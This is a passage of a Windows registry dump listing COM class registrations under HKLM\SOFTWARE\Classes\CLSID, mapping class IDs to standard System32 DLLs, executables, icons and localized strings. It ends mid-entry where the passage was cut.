HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B832674A-F36F-4780-AE4C-1566AAE3A4F4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B8558612-DF5E-4F95-BB81-8E910B327FB2}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mobsync.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b85ea052-9bdd-11d0-852c-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B862BC49-E7E7-427E-868A-DE0F7A75BC07}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B890AF56-AC8C-11D1-8CB7-00C04FC3261D}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\catsrv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b8967f85-58ae-4f46-9fb2-5d7904798f4b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B8B3F797-E237-4D1C-998A-1411D95B8C82}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B8BE1E19-B9E4-4ebb-B7F6-A8FE1B3871E0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fontext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b8f87e75-d1d5-446b-931c-3f61b97bca7a}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DXPServer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B9033E87-33CF-4D77-BC9B-895AFBBA72E4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mapsupdatetask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B9162A23-45F9-47CC-80F5-FE0FE9B9E1A2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\bidispl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b918dbc4-162c-43e5-85bf-19059a776e9e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b91a4db4-3630-11dc-9eaa-00161718cf63}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B91D5831-B1BD-4608-8198-D72E155020F7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usosvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B927879C-95D3-44BE-81C5-D76FC25ED221}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ActiveSyncCsp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B92E345D-F52D-41F3-B562-081BC772E3B9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b958f73c-9bdd-11d0-852c-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B977CB2D-EC6E-4A8F-BFFE-D18682BB0D52}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\sharemediacpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\sdcpl.dll,-100#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\sdcpl.dll,-101#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\sdcpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\sdcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B9931692-A2B3-4FAB-BF33-9EC6F9FB96AC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msctf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B9A160BE-0EB0-46A4-9942-30EB90BD792D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B9B05098-3E30-483F-87F7-027CA78DA287}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ApplicationFrameHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b9b61a03-caa7-43bb-b859-acd26d73b3f7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B9E84FFD-AD3C-40A4-B835-0882EBCBAAA8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B9F8535E-BF74-41C2-A6A6-7124442450DC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA126AD8-2166-11D1-B1D0-00805FC1270E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hnetcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA126AE0-2166-11D1-B1D0-00805FC1270E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hnetcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA126AE1-2166-11D1-B1D0-00805FC1270E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hnetcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA126AE2-2166-11D1-B1D0-00805FC1270E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hnetcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA126E01-2166-11D1-B1D0-00805FC1270E}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA126E01-2166-11D1-B1D0-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA126F01-2166-11D1-B1D0-00805FC1270E} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-1200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA126F01-2166-11D1-B1D0-00805FC1270E}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA126F01-2166-11D1-B1D0-00805FC1270E}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-5 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA126F01-2166-11D1-B1D0-00805FC1270E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA441419-0B3F-4FB6-A903-D16CC14CCA44}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA441419-0B3F-4FB6-A903-D16CC14CCA44}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PickerHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA4EAC04-AFCE-441A-A4F0-C4A97545425A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA5BDA58-9D0A-47BB-93D1-6655AEDA6517}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PackageStateRoaming.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ba6f127a-44ab-4674-b8f3-7131fa4dc645}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Shell.Search.UriHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA75691E-9FF3-492C-9053-4A91A40C556E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\FlightSettings.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA7C0D29-81CA-4901-B450-634E20BB8C34}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\prntvpt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsmplpxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BACF5C8A-A3C7-11D1-A760-00C04FB9603F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\appmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BADCC35D-8542-4A5C-A457-0ECCCF62508A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DscCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BAE3E62C-37D4-49AC-A6F1-0E485ECD6757}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsreng_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BAE86DDD-DC11-421C-B7AB-CC55D1D65C44}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PhotoMetadataHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB002029-DC5F-45FC-A8D9-A6BE23A748AB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB06C0E4-D293-4f75-8A90-CB05B6477EEE} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\systemcpl.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\systemcpl.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-149 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\systemcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB07BACD-CD56-4E63-A8FF-CBF0355FB9F4}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\es.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB0D7187-3C44-11D2-BB98-3078302C2030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cfgbkend.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB0DB60E-FFA0-4756-9F04-A0FCE6A97809}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcat.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB2D41DF-7E34-4F06-8F51-007C9CAD36BE} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\wlanpref.dll,-5201 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB2D41DF-7E34-4F06-8F51-007C9CAD36BE}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\wlanpref.dll,-103 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB2D41DF-7E34-4F06-8F51-007C9CAD36BE}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wlanpref.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{bb32d5df-dbe0-4776-82b3-0dc0d48afc81}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CapabilityAccessHandlers.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB5331F1-D8FF-4DDB-8A8F-2DF901123B33}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ppcsnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\ActionCenterCPL.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\ActionCenterCPL.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\ActionCenterCPL.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\ActionCenterCPL.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB68A765-9FB7-4D2C-A423-7AE4CD4B006C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WpcWebFilter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BB89EB37-081E-4F5D-BA35-8D636BB47440}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\srloc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{bba13638-b802-497a-8403-a5fe8689f814}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{bbb5d0e2-6f4b-4c31-8744-22d0029c4b40}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fdprint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BBB9389D-CB46-4855-ADA6-4570E7342B3C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BBD5AFE4-1417-40f7-94B3-A10719535CB4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcat.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BBD8C065-5E6C-4e88-BFD7-BE3E6D1C063B} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\powercpl.dll,-70 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BBD8C065-5E6C-4e88-BFD7-BE3E6D1C063B}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\System32\powercpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BBD8C065-5E6C-4e88-BFD7-BE3E6D1C063B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shpafact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BC065925-E8EF-4EF7-B8C5-006C8DB832D5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BC271022-28CD-468A-BBB0-EF7091D8625E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WLanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BC48B32F-5910-47F5-8570-5074A8A5636A} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\SyncCenter.dll,-6111 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BC48B32F-5910-47F5-8570-5074A8A5636A}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll,-1000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BC48B32F-5910-47F5-8570-5074A8A5636A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{bc65fb43-1958-4349-971a-210290480130}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\NcdProp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BC94D813-4D7F-11d2-A8C9-00AA00A71DCA}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassdo.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BCDE0395-E52F-467C-8E3D-C4579291692E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MMDevApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{bce9c4d2-0bd2-4ff7-8f94-d69225bb2c7f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpnapps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BCEA735B-4DAC-4B71-9C47-1D560AFD2A9B} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\DfsShlEx.dll,-102 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD0D38E4-74C8-4904-9B5A-269F8E9994E9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wiaaut.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD24FF86-6723-47B6-9C73-DA362CA6418F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\BackgroundMediaPolicy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{bd3739e8-3cf5-45fb-9cc3-28163c2e9ffd}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD472F60-27FA-11cf-B8B4-444553540000}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{bd69ecaa-ae5c-40d0-b968-7848f3778f56}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD6EDFCA-2890-482F-B233-8D7339A1CF8D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E} (Default) REG_EXPAND_SZ @%systemroot%\system32\mssvp.dll,-112 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\DefaultIcon (Default) REG_EXPAND_SZ %systemroot%\system32\mssvp.dll,-505 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssvp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD84B380-8CA2-1069-AB1D-08000948F534} DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\fontext.dll,-199 Icon REG_EXPAND_SZ %SystemRoot%\system32\fontext.dll,10 InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\Shell32.dll,-22920 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-22981 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD84B380-8CA2-1069-AB1D-08000948F534}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD84B380-8CA2-1069-AB1D-08000948F534}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fontext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD84B381-8CA2-1069-AB1D-08000948F534}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\panmap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BD95BA60-2E26-AAD1-AD99-00AA00B8E05A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\servdeps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BDE24877-01D7-4103-9704-F0EC82FA7CE9}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ppcsnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{bde9ee7c-329f-4fcf-ba7a-f8c6e9b4579d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BDF9E8B8-6C66-4E45-BA15-E050393DD079}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BDFDB94D-C788-4AD5-A113-6169B8B774F2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BDFEE05A-4418-11DD-90ED-001C257CCFF1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wwanapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BDFEE05B-4418-11DD-90ED-001C257CCFF1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wwanapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BDFEE05C-4418-11DD-90ED-001C257CCFF1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wwanapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BE0A9830-2B8B-11D1-A949-0060181EBBAD}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\msiprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{be382474-a1dd-4dc9-aa9b-2a934d67bd10}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{be88f957-42cc-4da7-92cf-9bc35c5d5ee2}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BE90B672-7D6F-4318-B953-B43544A80207}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\CfgSPCellular.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BE9B3133-250B-44A5-A278-C532B7B7FF76}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BEC09223-B018-416D-A0AC-523971B639F5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\BioCredProv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{becab11e-6629-4237-a9a4-5684579392a2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msvproc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BED4D415-7971-4310-AA07-6AC15EA06ACC}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\winethc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BEF723E2-01AD-438B-A441-D0112DF5142A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\PackageStateRoaming.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF0AC53F-D51C-419F-92E3-2298E125F004}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF3408BB-E44D-43CE-9267-03E2BD9EA52D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{bf50b68e-29b8-4386-ae9c-9734d5117cd5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF5CB148-7C77-4d8a-A53E-D81C70CF743C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdrm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{bf641d1c-29fd-4721-b3b8-48d92d35f7df}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF6E2DC4-960B-49C4-BE73-A2334AAB6D69}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ddpchunk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF71DF7C-D121-47D9-AB50-D960D0FB223D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF73A0FD-9772-45A8-AA69-26D6866667DD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WinBioExt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF77196E-24EF-4A02-BD52-A626D7AE837E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\BrowserSettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{bf78a650-d489-4360-a0b7-c32471e07692}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF85540E-0DF3-47bc-AC5D-305442704708}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\powercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF8841C9-378A-4CAD-B4FC-5091366CBC0D}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {BF8841C9-378A-4CAD-B4FC-5091366CBC0D} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BF981FDD-B743-11D1-A69A-00C04FB9988E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\catsrvut.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BFC26EED-19D0-4567-801D-0DB77E84B3EF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ApplicationControlCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BFCD4A0C-06B6-4384-B768-0DAA792C380E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UIAnimation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c00d8ee5-7325-49b5-b83d-e4f42ba7e073}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C01B9BA0-BEA7-41BA-B604-D0A36F469133} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63518 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C03A0FA8-76AC-4e62-B42A-1F8D8186B0F6}\InProcServer32 (Default) 